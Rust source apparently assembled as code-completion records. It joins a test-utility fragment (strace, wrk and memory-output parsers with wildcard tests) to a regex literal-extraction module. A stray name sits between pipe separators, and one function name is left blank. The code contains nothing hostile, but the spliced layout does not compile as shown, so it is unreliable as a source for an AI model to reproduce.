for line in data_lines {
let syscall_fields = line.split_whitespace().collect::<Vec<_>>();
let len = syscall_fields.len();
let syscall_name = syscall_fields.last().unwrap();
if (5..=6).contains(&len) {
summary.insert(
syscall_name.to_string(),
StraceOutput {
percent_time: str::parse::<f64>(syscall_fields[0]).unwrap(),
seconds: str::parse::<f64>(syscall_fields[1]).unwrap(),
usecs_per_call: Some(str::parse::<u64>(syscall_fields[2]).unwrap()),
calls: str::parse::<u64>(syscall_fields[3]).unwrap(),
errors: if syscall_fields.len() < 6 {
0
} else {
str::parse::<u64>(syscall_fields[4]).unwrap()
},
},
);
}
}
let total_fields = total_line.split_whitespace().collect::<Vec<_>>();
summary.insert(
"total".to_string(),
StraceOutput {
percent_time: str::parse::<f64>(total_fields[0]).unwrap(),
seconds: str::parse::<f64>(total_fields[1]).unwrap(),
usecs_per_call: None,
calls: str::parse::<u64>(total_fields[2]).unwrap(),
errors: str::parse::<u64>(total_fields[3]).unwrap(),
},
);
summary
}
pub fn parse_max_mem(output: &str) -> Option<u64> {
// Takes the output from "time -v" as input and extracts the 'maximum
// resident set size' and returns it in bytes.
for line in output.lines() {
if line
.to_lowercase()
.contains("maximum resident set size (kbytes)")
{
let value = line.split(": ").nth(1).unwrap();
return Some(str::parse::<u64>(value).unwrap() * 1024);
}
}
None
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn parse_wrk_output_1() {
const TEXT: &str = include_str!("./testdata/wrk1.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 1837);
assert!((wrk.latency - 6.25).abs() < f64::EPSILON);
}
#[test]
fn parse_wrk_output_2() {
const TEXT: &str = include_str!("./testdata/wrk2.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 53435);
assert!((wrk.latency - 6.22).abs() < f64::EPSILON);
}
#[test]
fn parse_wrk_output_3() {
const TEXT: &str = include_str!("./testdata/wrk3.txt");
let wrk = parse_wrk_output(TEXT);
assert_eq!(wrk.requests, 96037);
assert!((wrk.latency - 6.36).abs() < f64::EPSILON);
}
#[test]
fn strace_parse_1() {
const TEXT: &str = include_str!("./testdata/strace_summary.out");
let strace = parse_strace_output(TEXT);
// first syscall line
let munmap = strace.get("munmap").unwrap();
assert_eq!(munmap.calls, 60);
assert_eq!(munmap.errors, 0);
// line with errors
assert_eq!(strace.get("mkdir").unwrap().errors, 2);
// last syscall line
let prlimit = strace.get("prlimit64").unwrap();
assert_eq!(prlimit.calls, 2);
assert!((prlimit.percent_time - 0.0).abs() < f64::EPSILON);
// summary line
assert_eq!(strace.get("total").unwrap().calls, 704);
assert_eq!(strace.get("total").unwrap().errors, 5);
}
#[test]
fn strace_parse_2() {
const TEXT: &str = include_str!("./testdata/strace_summary2.out");
let strace = parse_strace_output(TEXT);
// first syscall line
let futex = strace.get("futex").unwrap();
assert_eq!(futex.calls, 449);
assert_eq!(futex.errors, 94);
// summary line
assert_eq!(strace.get("total").unwrap().calls, 821);
assert_eq!(strace.get("total").unwrap().errors, 107);
}
#[test]
fn test_wildcard_match() {
let fixtures = vec![
("foobarbaz", "foobarbaz", true),
("[WILDCARD]", "foobarbaz", true),
("foobar", "foobarbaz", false),
("foo[WILDCARD]baz", "foobarbaz", true),
("foo[WILDCARD]baz", "foobazbar", false),
("foo[WILDCARD]baz[WILDCARD]qux", "foobarbazqatqux", true),
("foo[WILDCARD]", "foobar", true),
("foo[WILDCARD]baz[WILDCARD]", "foobarbazqat", true),
// check with different line endings
("foo[WILDCARD]\nbaz[WILDCARD]\n", "foobar\nbazqat\n", true),
(
"foo[WILDCARD]\nbaz[WILDCARD]\n",
"foobar\r\nbazqat\r\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\n",
"foobar\nbazqat\r\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\r\n",
"foobar\nbazqat\n",
true,
),
(
"foo[WILDCARD]\r\nbaz[WILDCARD]\r\n",
"foobar\r\nbazqat\r\n",
true,
),
];
// Iterate through the fixture lists, testing each one
for (pattern, string, expected) in fixtures {
let actual = wildcard_match(pattern, string);
dbg!(pattern, string, expected);
assert_eq!(actual, expected);
}
}
#[test]
fn test_pattern_match() {
// foo, bar, baz, qux, quux, quuz, corge, grault, garply, waldo, fred, plugh, xyzzy
let wildcard = "[BAR]";
assert!(pattern_match("foo[BAR]baz", "foobarbaz", wildcard));
assert!(!pattern_match("foo[BAR]baz", "foobazbar", wildcard));
let multiline_pattern = "[BAR]
foo:
[BAR]baz[BAR]";
fn multi_line_builder(input: &str, leading_text: Option<&str>) -> String {
// If there is leading text add a newline so it's on it's own line
let head = match leading_text {
Some(v) => format!("{}\n", v),
None => "".to_string(),
};
format!(
"{}foo:
quuz {} corge
grault",
head, input
)
}
// Validate multi-line string builder
assert_eq!(
"QUUX=qux
foo:
quuz BAZ corge
grault",
multi_line_builder("BAZ", Some("QUUX=qux"))
);
// Correct input & leading line
assert!(pattern_match(
multiline_pattern,
&multi_line_builder("baz", Some("QUX=quux")),
wildcard
));
// Correct input & no leading line
assert!(pattern_match(
multiline_pattern,
&multi_line_builder("baz", None),
wildcard
));
// Incorrect input & leading line
assert!(!pattern_match(
multiline_pattern,
&multi_line_builder("garply", Some("QUX=quux")),
wildcard
));
// Incorrect input & no leading line
assert!(!pattern_match(
multiline_pattern,
&multi_line_builder("garply", None),
wildcard
));
}
#[test]
fn max_mem_parse() {
const TEXT: &str = include_str!("./testdata/time.out");
let size = parse_max_mem(TEXT);
assert_eq!(size, Some(120380 * 1024));
}
}
| wrap_https_h1_only_server |
literals.rs | // Copyright 2014-2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use libtww::std::cmp;
use libtww::std::fmt;
use libtww::std::iter;
use libtww::std::mem;
use libtww::std::ops;
use {Expr, CharClass, ClassRange, ByteClass, ByteRange, Repeater};
/// A set of literal byte strings extracted from a regular expression.
///
/// Every member of the set is a `Lit`, which is represented by a `Vec<u8>`.
/// (Notably, it may contain invalid UTF-8.) Every member is said to be either
/// *complete* or *cut*. A complete literal means that it extends until the
/// beginning (or end) of the regular expression. In some circumstances, this
/// can be used to indicate a match in the regular expression.
///
/// Note that a key aspect of literal extraction is knowing when to stop. It is
/// not feasible to blindly extract all literals from a regular expression,
/// even if there are finitely many. For example, the regular expression
/// `[0-9]{10}` has `10^10` distinct literals. For this reason, literal
/// extraction is bounded to some low number by default using heuristics, but
/// the limits can be tweaked.
#[derive(Clone, Eq, PartialEq)]
pub struct Literals {
lits: Vec<Lit>,
limit_size: usize,
limit_class: usize,
}
/// A single member of a set of literals extracted from a regular expression.
///
/// This type has `Deref` and `DerefMut` impls to `Vec<u8>` so that all slice
/// and `Vec` operations are available.
#[derive(Clone, Eq, Ord)]
pub struct Lit {
v: Vec<u8>,
cut: bool,
}
impl Literals {
/// Returns a new empty set of literals using default limits.
pub fn empty() -> Literals {
Literals {
lits: vec![],
limit_size: 250,
limit_class: 10,
}
}
/// Get the approximate size limit (in bytes) of this set.
pub fn limit_size(&self) -> usize {
self.limit_size
}
/// Set the approximate size limit (in bytes) of this set.
///
/// If extracting a literal would put the set over this limit, then
/// extraction stops.
///
/// The new limits will only apply to additions to this set. Existing
/// members remain unchanged, even if the set exceeds the new limit.
pub fn set_limit_size(&mut self, size: usize) -> &mut Literals {
self.limit_size = size;
self
}
/// Get the character class size limit for this set.
pub fn limit_class(&self) -> usize {
self.limit_class
}
/// Limits the size of character(or byte) classes considered.
///
/// A value of `0` prevents all character classes from being considered.
///
/// This limit also applies to case insensitive literals, since each
/// character in the case insensitive literal is converted to a class, and
/// then case folded.
///
/// The new limits will only apply to additions to this set. Existing
/// members remain unchanged, even if the set exceeds the new limit.
pub fn set_limit_class(&mut self, size: usize) -> &mut Literals {
self.limit_class = size;
self
}
/// Returns the set of literals as a slice. Its order is unspecified.
pub fn literals(&self) -> &[Lit] {
&self.lits
}
/// Returns the length of the smallest literal.
///
/// Returns None is there are no literals in the set.
pub fn min_len(&self) -> Option<usize> {
let mut min = None;
for lit in &self.lits {
match min {
None => min = Some(lit.len()),
Some(m) if lit.len() < m => min = Some(lit.len()),
_ => {}
}
}
min
}
/// Returns true if all members in this set are complete.
pub fn all_complete(&self) -> bool {
!self.lits.is_empty() && self.lits.iter().all(|l| !l.is_cut())
}
/// Returns true if any member in this set is complete.
pub fn any_complete(&self) -> bool {
self.lits.iter().any(|lit| !lit.is_cut())
}
/// Returns true if this set contains an empty literal.
pub fn contains_empty(&self) -> bool {
self.lits.iter().any(|lit| lit.is_empty())
}
/// Returns true if this set is empty or if all of its members is empty.
pub fn is_empty(&self) -> bool {
self.lits.is_empty() || self.lits.iter().all(|lit| lit.is_empty())
}
/// Returns a new empty set of literals using this set's limits.
pub fn to_empty(&self) -> Literals {
let mut lits = Literals::empty();
lits.set_limit_size(self.limit_size)
.set_limit_class(self.limit_class);
lits
}
/// Returns the longest common prefix of all members in this set.
pub fn longest_common_prefix(&self) -> &[u8] {
if self.is_empty() {
return &[];
}
let lit0 = &*self.lits[0];
let mut len = lit0.len();
for lit in &self.lits[1..] {
len = cmp::min(len,
lit.iter()
.zip(lit0)
.take_while(|&(a, b)| a == b)
.count());
}
&self.lits[0][..len]
}
/// Returns the longest common suffix of all members in this set.
pub fn longest_common_suffix(&self) -> &[u8] {
if self.is_empty() {
return &[];
}
let lit0 = &*self.lits[0];
let mut len = lit0.len();
for lit in &self.lits[1..] {
len = cmp::min(len,
lit.iter()
.rev()
.zip(lit0.iter().rev())
.take_while(|&(a, b)| a == b)
.count());
}
&self.lits[0][self.lits[0].len() - len..]
}
/// Returns a new set of literals with the given number of bytes trimmed
/// from the suffix of each literal.
///
/// If any literal would be cut out completely by trimming, then None is
/// returned.
///
/// Any duplicates that are created as a result of this transformation are
/// removed.
pub fn trim_suffix(&self, num_bytes: usize) -> Option<Literals> {
if self.min_len().map(|len| len <= num_bytes).unwrap_or(true) {
return None;
}
let mut new = self.to_empty();
for mut lit in self.lits.iter().cloned() {
let new_len = lit.len() - num_bytes;
lit.truncate(new_len);
lit.cut();
new.lits.push(lit);
}
new.lits.sort();
new.lits.dedup();
Some(new)
}
/// Returns a new set of prefixes of this set of literals that are
/// guaranteed to be unambiguous.
///
/// Any substring match with a member of the set is returned is guaranteed
/// to never overlap with a substring match of another member of the set
/// at the same starting position.
///
/// Given any two members of the returned set, neither is a substring of
/// the other.
pub fn unambiguous_prefixes(&self) -> Literals {
if self.lits.is_empty() {
return self.to_empty();
}
let mut new = self.to_empty();
'OUTER: for lit1 in &self.lits {
if new.lits.is_empty() {
new.lits.push(lit1.clone());
continue;
}
let mut candidate = lit1.clone();
for lit2 in &mut new.lits {
if lit2.is_empty() {
continue;
}
if &candidate == lit2 {
// If the literal is already in the set, then we can
// just drop it. But make sure that cut literals are
// infectious!
candidate.cut = candidate.cut || lit2.cut;
lit2.cut = candidate.cut;
continue 'OUTER;
}
if candidate.len() <= lit2.len() {
if let Some(i) = position(&candidate, &lit2) {
lit2.truncate(i);
lit2.cut();
candidate.cut();
}
} else {
if let Some(i) = position(&lit2, &candidate) {
candidate.truncate(i);
candidate.cut();
lit2.cut();
}
}
// Oops, the candidate is already represented in the set.
if candidate.is_empty() {
continue 'OUTER;
}
}
new.lits.push(candidate);
}
new.lits.retain(|lit| !lit.is_empty());
new.lits.sort();
new.lits.dedup();
new
}
/// Returns a new set of suffixes of this set of literals that are
/// guaranteed to be unambiguous.
///
/// Any substring match with a member of the set is returned is guaranteed
/// to never overlap with a substring match of another member of the set
/// at the same ending position.
///
/// Given any two members of the returned set, neither is a substring of
/// the other.
pub fn unambiguous_suffixes(&self) -> Literals {
// This is a touch wasteful...
let mut lits = self.clone();
lits.reverse();
let mut unamb = lits.unambiguous_prefixes();
unamb.reverse();
unamb
}
/// Unions the prefixes from the given expression to this set.
///
/// If prefixes could not be added (for example, this set would exceed its
/// size limits or the set of prefixes from `expr` includes the empty
/// string), then false is returned.
///
/// Note that prefix literals extracted from `expr` are said to be complete
/// if and only if the literal extends from the beginning of `expr` to the
/// end of `expr`.
pub fn union_prefixes(&mut self, expr: &Expr) -> bool {
let mut lits = self.to_empty();
prefixes(expr, &mut lits);
!lits.is_empty() && !lits.contains_empty() && self.union(lits)
}
/// Unions the suffixes from the given expression to this set.
///
/// If suffixes could not be added (for example, this set would exceed its
/// size limits or the set of suffixes from `expr` includes the empty
/// string), then false is returned.
///
/// Note that prefix literals extracted from `expr` are said to be complete
/// if and only if the literal extends from the end of `expr` to the
/// beginning of `expr`.
pub fn union_suffixes(&mut self, expr: &Expr) -> bool {
let mut lits = self.to_empty();
suffixes(expr, &mut lits);
lits.reverse();
!lits.is_empty() && !lits.contains_empty() && self.union(lits)
}
/// Unions this set with another set.
///
/// If the union would cause the set to exceed its limits, then the union
/// is skipped and it returns false. Otherwise, if the union succeeds, it
/// returns true.
pub fn union(&mut self, lits: Literals) -> bool {
if self.num_bytes() + lits.num_bytes() > self.limit_size {
return false;
}
if lits.is_empty() {
self.lits.push(Lit::empty());
} else {
self.lits.extend(lits.lits);
}
true
}
/// Extends this set with another set.
///
/// The set of literals is extended via a cross product.
///
/// If a cross product would cause this set to exceed its limits, then the
/// cross product is skipped and it returns false. Otherwise, if the cross
/// product succeeds, it returns true.
pub fn cross_product(&mut self, lits: &Literals) -> bool {
if lits.is_empty() {
return true;
}
// Check that we make sure we stay in our limits.
let mut size_after;
if self.is_empty() || !self.any_complete() {
size_after = self.num_bytes();
for lits_lit in lits.literals() {
size_after += lits_lit.len();
}
} else {
size_after = self.lits.iter().fold(0, |accum, lit| {
accum +
if lit.is_cut() {
lit.len()
} else {
0
}
});
for lits_lit in lits.literals() {
for self_lit in self.literals() {
if !self_lit.is_cut() {
size_after += self_lit.len() + lits_lit.len();
}
}
}
}
if size_after > self.limit_size {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for lits_lit in lits.literals() {
for mut self_lit in base.clone() {
self_lit.extend(&**lits_lit);
self_lit.cut = lits_lit.cut;
self.lits.push(self_lit);
}
}
true
}
/// Extends each literal in this set with the bytes given.
///
/// If the set is empty, then the given literal is added to the set.
///
/// If adding any number of bytes to all members of this set causes a limit
/// to be exceeded, then no bytes are added and false is returned. If a
/// prefix of `bytes` can be fit into this set, then it is used and all
/// resulting literals are cut.
pub fn cross_add(&mut self, bytes: &[u8]) -> bool {
// N.B. This could be implemented by simply calling cross_product with
// a literal set containing just `bytes`, but we can be smarter about
// taking shorter prefixes of `bytes` if they'll fit.
if bytes.is_empty() {
return true;
}
if self.lits.is_empty() {
let i = cmp::min(self.limit_size, bytes.len());
self.lits.push(Lit::new(bytes[..i].to_owned()));
self.lits[0].cut = i < bytes.len();
return !self.lits[0].is_cut();
}
let size = self.num_bytes();
if size + self.lits.len() >= self.limit_size {
return false;
}
let mut i = 1;
while size + (i * self.lits.len()) <= self.limit_size && i < bytes.len() {
i += 1;
}
for lit in &mut self.lits {
if !lit.is_cut() {
lit.extend(&bytes[..i]);
if i < bytes.len() {
lit.cut();
}
}
}
true
}
/// Adds the given literal to this set.
///
/// Returns false if adding this literal would cause the class to be too
/// big.
pub fn add(&mut self, lit: Lit) -> bool {
if self.num_bytes() + lit.len() > self.limit_size {
return false;
}
self.lits.push(lit);
true
}
/// Extends each literal in this set with the character class given.
///
/// Returns false if the character class was too big to add.
pub fn add_char_class(&mut self, cls: &CharClass) -> bool {
self._add_char_class(cls, false)
}
/// Extends each literal in this set with the character class given,
/// writing the bytes of each character in reverse.
///
/// Returns false if the character class was too big to add.
fn add_char_class_reverse(&mut self, cls: &CharClass) -> bool {
self._add_char_class(cls, true)
}
fn _add_char_class(&mut self, cls: &CharClass, reverse: bool) -> bool {
use libtww::std::char;
if self.class_exceeds_limits(cls.num_chars()) {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for r in cls {
let (s, e) = (r.start as u32, r.end as u32 + 1);
for c in (s..e).filter_map(char::from_u32) {
for mut lit in base.clone() {
let mut bytes = c.to_string().into_bytes();
if reverse {
bytes.reverse();
}
lit.extend(&bytes);
self.lits.push(lit);
}
}
}
true
}
/// Extends each literal in this set with the byte class given.
///
/// Returns false if the byte class was too big to add.
pub fn add_byte_class(&mut self, cls: &ByteClass) -> bool {
if self.class_exceeds_limits(cls.num_bytes()) {
return false;
}
let mut base = self.remove_complete();
if base.is_empty() {
base = vec![Lit::empty()];
}
for r in cls {
let (s, e) = (r.start as u32, r.end as u32 + 1);
for b in (s..e).map(|b| b as u8) {
for mut lit in base.clone() {
lit.push(b);
self.lits.push(lit);
}
}
}
true
}
/// Cuts every member of this set. When a member is cut, it can never
/// be extended.
pub fn | (&mut self) {
for lit in &mut self.lits {
lit.cut();
}
}
/// Reverses all members in place.
pub fn reverse(&mut self) {
for lit in &mut self.lits {
lit.reverse();
}
}
/// Clears this set of all members.
pub fn clear(&mut self) {
self.lits.clear();
}
/// Pops all complete literals out of this set.
fn remove_complete(&mut self) -> Vec<Lit> {
let mut base = vec![];
for lit in mem::replace(&mut self.lits, vec![]) {
if lit.is_cut() {
self.lits.push(lit);
} else {
base.push(lit);
}
}
base
}
/// Returns the total number of bytes in this set.
fn num_bytes(&self) -> usize {
self.lits.iter().fold(0, |accum, lit| accum + lit.len())
}
/// Returns true if a character class with the given size would cause this
/// set to exceed its limits.
///
/// The size given should correspond to the number of items in the class.
fn class_exceeds_limits(&self, size: usize) -> bool {
if size > self.limit_class {
return true;
}
// This is an approximation since codepoints in a char class can encode
// to 1-4 bytes.
let new_byte_count = if self.lits.is_empty() {
size
} else {
self.lits
.iter()
.fold(0, |accum, lit| {
accum +
if lit.is_cut() {
// If the literal is cut, then we'll never add
// anything to it, so don't count it.
0
} else {
(lit.len() + 1) * size
}
})
};
new_byte_count > self.limit_size
}
}
fn prefixes(expr: &Expr, lits: &mut Literals) {
use Expr::*;
match *expr {
Literal { ref chars, casei: false } => {
let s: String = chars.iter().cloned().collect();
lits.cross_add(s.as_bytes());
}
Literal { ref chars, casei: true } => {
for &c in chars {
let cls = CharClass::new(vec![
ClassRange { start: c, end: c },
])
.case_fold();
if !lits.add_char_class(&cls) {
lits.cut();
return;
}
}
}
LiteralBytes { ref bytes, casei: false } => {
lits.cross_add(bytes);
}
LiteralBytes { ref bytes, casei: true } => {
for &b in bytes {
let cls = ByteClass::new(vec![
ByteRange { start: b, end: b },
])
.case_fold();
if !lits.add_byte_class(&cls) {
lits.cut();
return;
}
}
}
Class(ref cls) => {
if !lits.add_char_class(cls) {
lits.cut();
}
}
ClassBytes(ref cls) => {
if !lits.add_byte_class(cls) {
lits.cut();
}
}
Group { ref e, .. } => {
prefixes(&**e, lits);
}
Repeat { ref e, r: Repeater::ZeroOrOne, .. } => {
repeat_zero_or_one_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::ZeroOrMore, .. } => {
repeat_zero_or_more_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::OneOrMore, .. } => {
repeat_one_or_more_literals(&**e, lits, prefixes);
}
Repeat { ref e, r: Repeater::Range { min, max }, greedy } => {
repeat_range_literals(&**e, min, max, greedy, lits, prefixes);
}
Concat(ref es) if es.is_empty() => {}
Concat(ref es) if es.len() == 1 => prefixes(&es[0], lits),
Concat(ref es) => {
for e in es {
if let StartText = *e {
if !lits.is_empty() {
lits.cut();
break;
}
lits.add(Lit::empty());
continue;
}
let mut lits2 = lits.to_empty();
prefixes(e, &mut lits2);
if !lits.cross_product(&lits2) || !lits2.any_complete() {
// If this expression couldn't yield any literal that
// could be extended, then we need to quit. Since we're
// short-circuiting, we also need to freeze every member.
lits.cut();
break;
}
}
}
Alternate(ref es) => {
alternate_literals(es, lits, prefixes);
}
_ => lits.cut(),
}
}
fn suffixes(expr: &Expr, lits: &mut Literals) {
use Expr::*;
match *expr {
Literal { ref chars, casei: false } => {
let s: String = chars.iter().cloned().collect();
let mut bytes = s.into_bytes();
bytes.reverse();
lits.cross_add(&bytes);
}
Literal { ref chars, casei: true } => {
for &c in chars.iter().rev() {
let cls = CharClass::new(vec![
ClassRange { start: c, end: c },
])
.case_fold();
if !lits.add_char_class_reverse(&cls) {
lits.cut();
return;
}
}
}
LiteralBytes { ref bytes, casei: false } => {
let b: Vec<u8> = bytes.iter().rev().cloned().collect();
lits.cross_add(&b);
}
LiteralBytes { ref bytes, casei: true } => {
for &b in bytes.iter().rev() {
let cls = ByteClass::new(vec![
ByteRange { start: b, end: b },
])
.case_fold();
if !lits.add_byte_class(&cls) {
lits.cut();
return;
}
}
}
Class(ref cls) => {
if !lits.add_char_class_reverse(cls) {
lits.cut();
}
}
ClassBytes(ref cls) => {
if !lits.add_byte_class(cls) {
lits.cut();
}
}
Group { ref e, .. } => {
suffixes(&**e, lits);
}
Repeat { ref e, r: Repeater::ZeroOrOne, .. } => {
repeat_zero_or_one_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::ZeroOrMore, .. } => {
repeat_zero_or_more_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::OneOrMore, .. } => {
repeat_one_or_more_literals(&**e, lits, suffixes);
}
Repeat { ref e, r: Repeater::Range { min, max }, greedy } => {
repeat_range_literals(&**e, min, max, greedy, lits, suffixes);
}
Concat(ref es) if es.is_empty() => {}
Concat(ref es) if es.len() == 1 => suffixes(&es[0], lits),
Concat(ref es) => {
for e in es.iter().rev() {
if let EndText = *e {
if !lits.is_empty() {
lits.cut();
break;
}
lits.add(Lit::empty());
continue;
}
let mut lits2 = lits.to_empty();
suffixes(e, &mut lits2);
if !lits.cross_product(&lits2) || !lits2.any_complete() {
// If this expression couldn't yield any literal that
// could be extended, then we need to quit. Since we're
// short-circuiting, we also need to freeze every member.
lits.cut();
break;
}
}
}
Alternate(ref es) => {
alternate_literals(es, lits, suffixes);
}
_ => lits.cut(),
}
}
fn repeat_zero_or_one_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
let (mut lits2, mut lits3) = (lits.clone(), lits.to_empty());
lits3.set_limit_size(lits.limit_size() / 2);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.cross_product(&lits3) {
lits.cut();
return;
}
lits2.add(Lit::empty());
if !lits.union(lits2) {
lits.cut();
}
}
fn repeat_zero_or_more_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
let (mut lits2, mut lits3) = (lits.clone(), lits.to_empty());
lits3.set_limit_size(lits.limit_size() / 2);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.cross_product(&lits3) {
lits.cut();
return;
}
lits2.cut();
lits2.add(Lit::empty());
if !lits.union(lits2) {
lits.cut();
}
}
fn repeat_one_or_more_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
lits: &mut Literals,
mut f: F) {
f(e, lits);
lits.cut();
}
fn repeat_range_literals<F: FnMut(&Expr, &mut Literals)>(e: &Expr,
min: u32,
max: Option<u32>,
greedy: bool,
lits: &mut Literals,
mut f: F) {
use Expr::*;
if min == 0 {
// This is a bit conservative. If `max` is set, then we could
// treat this as a finite set of alternations. For now, we
// just treat it as `e*`.
f(&Repeat {
e: Box::new(e.clone()),
r: Repeater::ZeroOrMore,
greedy: greedy,
},
lits);
} else {
if min > 0 {
let n = cmp::min(lits.limit_size, min as usize);
let es = iter::repeat(e.clone()).take(n).collect();
f(&Concat(es), lits);
if n < min as usize {
lits.cut();
}
}
if max.map_or(true, |max| min < max) {
lits.cut();
}
}
}
fn alternate_literals<F: FnMut(&Expr, &mut Literals)>(es: &[Expr], lits: &mut Literals, mut f: F) {
let mut lits2 = lits.to_empty();
for e in es {
let mut lits3 = lits.to_empty();
lits3.set_limit_size(lits.limit_size() / 5);
f(e, &mut lits3);
if lits3.is_empty() || !lits2.union(lits3) {
// If we couldn't find suffixes for *any* of the
// alternates, then the entire alternation has to be thrown
// away and any existing members must be frozen. Similarly,
// if the union couldn't complete, stop and freeze.
lits.cut();
return;
}
}
if !lits.cross_product(&lits2) {
lits.cut();
}
}
impl fmt::Debug for Literals {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
f.debug_struct("Literals")
.field("lits", &self.lits)
.field("limit_size", &self.limit_size)
.field("limit_class", &self.limit_class)
.finish()
}
}
impl Lit {
/// Returns a new complete literal with the bytes given.
pub fn new(bytes: Vec<u8>) -> Lit {
Lit {
v: bytes,
cut: false,
}
}
/// Returns a new complete empty literal.
pub fn empty() -> Lit {
Lit {
v: vec![],
cut: false,
}
}
/// Returns true if this literal was "cut."
pub fn is_cut(&self) -> bool {
self.cut
}
/// Cuts this literal.
pub fn cut(&mut self) {
self.cut = true;
}
}
impl PartialEq for Lit {
fn eq(&self, other: &Lit) -> bool {
self.v == other.v
}
}
impl PartialOrd for Lit {
fn partial_cmp(&self, other: &Lit) -> Option<cmp::Ordering> {
self.v.partial_cmp(&other.v)
}
}
impl fmt::Debug for Lit {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.is_cut() {
write!(f, "Cut({})", escape_unicode(&self.v))
} else {
write!(f, "Complete({})", escape_unicode(&self.v))
}
}
}
impl AsRef<[u8]> for Lit {
fn as_ref(&self) -> &[u8] {
&self.v
}
}
impl ops::Deref for Lit {
type Target = Vec<u8>;
fn deref(&self) -> &Vec<u8> {
&self.v
}
}
impl ops::DerefMut for Lit {
fn deref_mut(&mut self) -> &mut Vec<u8> {
&mut self.v
}
}
fn position(needle: &[u8], mut haystack: &[u8]) -> Option<usize> {
let mut i = 0;
while haystack.len() >= needle.len() {
if needle == &haystack[..needle.len()] {
return Some(i);
}
i += 1;
haystack = &haystack[1..];
}
None
}
fn escape_unicode(bytes: &[u8]) -> String {
let show = match ::libtww::std::str::from_utf8(bytes) {
Ok(v) => v.to_string(),
Err(_) => escape_bytes(bytes),
};
let mut space_escaped = String::new();
for c in show.chars() {
if c.is_whitespace() {
let escaped = if c as u32 <= 0x7F {
escape_byte(c as u8)
} else {
if c as u32 <= 0xFFFF {
format!(r"\u{{{:04x}}}", c as u32)
} else {
format!(r"\U{{{:08x}}}", c as u32)
}
};
space_escaped.push_str(&escaped);
} else {
space_escaped.push(c);
}
}
space_escaped
}
fn escape_bytes(bytes: &[u8]) -> String {
let mut s = String::new();
for &b in bytes {
s.push_str(&escape_byte(b));
}
s
}
fn escape_byte(byte: u8) -> String {
use libtww::std::ascii::escape_default;
let escaped: Vec<u8> = escape_default(byte).collect();
String::from_utf8_lossy(&escaped).into_owned()
}
#[cfg(test)]
mod tests {
use libtww::std::fmt;
use {Expr, ExprBuilder};
use super::{Literals, Lit, escape_bytes};
// To make test failures easier to read.
#[derive(Debug, Eq, PartialEq)]
struct Bytes(Vec<ULit>);
#[derive(Debug, Eq, PartialEq)]
struct Unicode(Vec<ULit>);
fn escape_lits(blits: &[Lit]) -> Vec<ULit> {
let mut ulits = vec![];
for blit in blits {
ulits.push(ULit {
v: escape_bytes(&blit),
cut: blit.is_cut(),
});
}
ulits
}
fn create_lits<I: IntoIterator<Item = Lit>>(it: I) -> Literals {
Literals {
lits: it.into_iter().collect(),
limit_size: 0,
limit_class: 0,
}
}
// Needs to be pub for 1.3?
#[derive(Clone, Eq, PartialEq)]
pub struct ULit {
v: String,
cut: bool,
}
impl ULit {
fn is_cut(&self) -> bool {
self.cut
}
}
impl fmt::Debug for ULit {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
if self.is_cut() {
write!(f, "Cut({})", self.v)
} else {
write!(f, "Complete({})", self.v)
}
}
}
impl PartialEq<Lit> for ULit {
fn eq(&self, other: &Lit) -> bool {
self.v.as_bytes() == &*other.v && self.is_cut() == other.is_cut()
}
}
impl PartialEq<ULit> for Lit {
fn eq(&self, other: &ULit) -> bool {
&*self.v == other.v.as_bytes() && self.is_cut() == other.is_cut()
}
}
#[allow(non_snake_case)]
fn C(s: &'static str) -> ULit {
ULit {
v: s.to_owned(),
cut: true,
}
}
#[allow(non_snake_case)]
fn M(s: &'static str) -> ULit {
ULit {
v: s.to_owned(),
cut: false,
}
}
fn prefixes(lits: &mut Literals, expr: &Expr) {
lits.union_prefixes(expr);
}
fn suffixes(lits: &mut Literals, expr: &Expr) {
lits.union_suffixes(expr);
}
macro_rules! assert_lit_eq {
($which:ident, $got_lits:expr, $($expected_lit:expr),*) => {{
let expected: Vec<ULit> = vec![$($expected_lit),*];
let lits = $got_lits;
assert_eq!(
$which(expected.clone()),
$which(escape_lits(lits.literals())));
assert_eq!(
!expected.is_empty() && expected.iter().all(|l| !l.is_cut()),
lits.all_complete());
assert_eq!(
expected.iter().any(|l| !l.is_cut()),
lits.any_complete());
}};
}
macro_rules! test_lit {
($name:ident, $which:ident, $re:expr) => {
test_lit!($name, $which, $re,);
};
($name:ident, $which:ident, $re:expr, $($lit:expr),*) => {
#[test]
fn $name() {
let expr = Expr::parse($re).unwrap();
let lits = expr.$which();
assert_lit_eq!(Unicode, lits, $($lit),*);
let expr = ExprBuilder::new().allow_bytes(true).unicode(false)
.parse($re).unwrap();
let lits = expr.$which();
assert_lit_eq!(Bytes, lits, $($lit),*);
}
};
}
// ************************************************************************
// Tests for prefix literal extraction.
// ************************************************************************
// Elementary tests.
test_lit!(pfx_one_lit1, prefixes, "a", M("a"));
test_lit!(pfx_one_lit2, prefixes, "abc", M("abc"));
